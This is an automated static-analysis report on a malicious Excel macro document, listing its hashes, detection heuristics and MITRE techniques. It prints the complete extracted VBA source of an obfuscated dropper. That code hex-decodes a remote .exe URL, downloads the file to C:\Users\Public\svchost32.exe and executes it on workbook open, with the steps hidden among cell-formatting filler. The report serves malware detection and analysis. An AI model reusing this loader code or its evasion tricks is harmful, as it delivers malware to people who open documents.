Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0933c843ccb88cfb…

MALICIOUS

Office (OOXML)

53.1 KB First seen: 2020-09-15
MD5: 77975f5d776752d9d42b02b4a9cad191 SHA-1: 91a925f81d13a38dc31f2b50847cedfd0c6a458c SHA-256: 0933c843ccb88cfbeaad94e253f30f8a8f80fa2250f54b625659541455c68de5
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The VBA macro contains a Workbook_Open subroutine that is triggered when the document is opened. This subroutine calls a custom function which decodes a hex string into a URL and then downloads and executes a file from that URL. The decoded URL is 'http://pt.capehattherasphotographers.com/small/MovoVMM.exe'. This behavior is indicative of a downloader or droppper malware.

Heuristics 6

  • ClamAV: Xls.Malware.Sagent-10035294-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Sagent-10035294-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    strmweajsdjkvm_babu.write hthsduerkbxvbhagasdjl_babu.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set hthsduerkbxvbhagasdjl_babu = CreateObject(PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set hthsduerkbxvbhagasdjl_babu = CreateObject(PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50"))
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6614 bytes
SHA-256: 96b1c97a5a798169259f6f40e4d39c63b6120f4a76e741667e561141baf5551d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
COmm0NAzs893TraCXVaPlCXFQAEWRGFYTDZCXFA"68 74 74 70 3A 2F 2F 70 74 2E 63 61 70 65 68 61 74 74 65 72 61 73 70 68 6F 74 6F 67 72 61 70 68 65 72 73 2E 63 6F 6D 2F 73 6D 61 6C 6C 6C 2F 4D 6F 76 6F 56 4D 4D 2E 65 78 65"
End Sub
Public Sub COmm0NAzs893TraCXVaPlCXFQAEWRGFYTDZCXFA(Link As String)
	Range("A1:J22").Select
    	Selection.Borders(xlDiagonalDown).LineStyle = xlNone
    	Selection.Borders(xlDiagonalUp).LineStyle = xlNone
    	With Selection.Borders(xlEdgeLeft)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    	End With
Dim hthsduerkbxvbhagasdjl_babu
	With Selection.Borders(xlEdgeTop)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    	End With
Dim strmweajsdjkvm_babu
 	With Selection.Borders(xlEdgeBottom)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    	End With
Dim shelaorl_babu
	With Selection.Borders(xlEdgeRight)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    	End With
Set hthsduerkbxvbhagasdjl_babu = CreateObject(PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50"))
	With Selection.Borders(xlInsideVertical)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    	End With
Set strmweajsdjkvm_babu = CreateObject(PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("41 44 4f 44 42 2e 53 74 72 65 61 6d"))
 	With Selection.Borders(xlInsideHorizontal)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    	End With
Set shelaorl_babu = CreateObject(PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("57 53 63 72 69 70 74 2e 53 68 65 6c 6c "))
 	ActiveWindow.SmallScroll Down:=-12
    	Range("A1").Select
    	ActiveCell.FormulaR1C1 = "S.No"
    	Range("B1").Select
    	ActiveCell.FormulaR1C1 = "Name"
    	Range("C1").Select
    	ActiveCell.FormulaR1C1 = "Unit"
    	Range("D1").Select
    	ActiveCell.FormulaR1C1 = "Price"
    	Range("E1").Select
    	ActiveCell.FormulaR1C1 = "Qty"
    	Range("F1:J22").Select
Url = PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW(Link)
	With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = False
    	End With
    	Selection.Merge
urloasjdklweqad_babu = PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65")
	With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlBottom
        .WrapText = False
        .Orientation = xlVertical
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    	End With
RUNCMD = PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65")
	Range("F1:J22").Select
    	ActiveCell.FormulaR1C1 = "S"
   	Range("F1:J22").Select
    	ActiveCell.FormulaR1C1 = "S" & Chr(10) & "u" & Chr(10) & "m" & Chr(10) & "r" & Chr(10) & "r" & Chr(10) & "y"
    	Range("F1:J22").Select
hthsduerkbxvbhagasdjl_babu.Open "G" + "E" + "T", Url, False
	With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlBottom
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    	End With
hthsduerkbxvbhagasdjl_babu.send
	Range("F1:J22").Select
    	With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xlCenter
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = True
    	End With
strmweajsdjkvm_babu.Type = 1
	With Selection.Font
        .Name = "Calibri"
        .Size = 14
        .Strikethrough = False
        .Superscript = False
        .Subscript = False
        .OutlineFont = False
        .Shadow = False
        .Underline = xlUnderlineStyleNone
        .ThemeColor = xlThemeColorLight1
        .TintAndShade = 0
        .ThemeFont = xlThemeFontMinor
    	End With
strmweajsdjkvm_babu.Open
	Selection.Font.Bold = True
strmweajsdjkvm_babu.write hthsduerkbxvbhagasdjl_babu.responseBody
    	Selection.Font.Italic = True
strmweajsdjkvm_babu.savetofile urloasjdklweqad_babu, 2
    	Range("L4").Select
shelaorl_babu.Run RUNCMD

End Sub

Public Function PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW(ByVal AZplOKICbdgCBDgTrADSfPlo9823FCSdNmmBCGFTADSCXV As String) As String
Dim wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa   As String
Dim BskNReMCJaZCoNQWxhdNHPWROasZurAFICRkzTCZSOMTNogwUKNAfZT As String
Dim mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev         As Long
    For mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev = 1 To Len(AZplOKICbdgCBDgTrADSfPlo9823FCSdNmmBCGFTADSCXV) Step 3
        wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa = Chr$(Val("&H" & Mid$(AZplOKICbdgCBDgTrADSfPlo9823FCSdNmmBCGFTADSCXV, mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev, 2)))
        BskNReMCJaZCoNQWxhdNHPWROasZurAFICRkzTCZSOMTNogwUKNAfZT = BskNReMCJaZCoNQWxhdNHPWROasZurAFICRkzTCZSOMTNogwUKNAfZT & wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa
    Next mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev
    PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW = BskNReMCJaZCoNQWxhdNHPWROasZurAFICRkzTCZSOMTNogwUKNAfZT
End Function

Attribute VB_Name = "Sheet 1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 7168 bytes
SHA-256: 3bfc11f58246e8ff93b09fceb30ce76d6e548f5c382b42cea975a721a8d9e7e2
Detection
ClamAV: Xls.Malware.Sagent-10035294-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.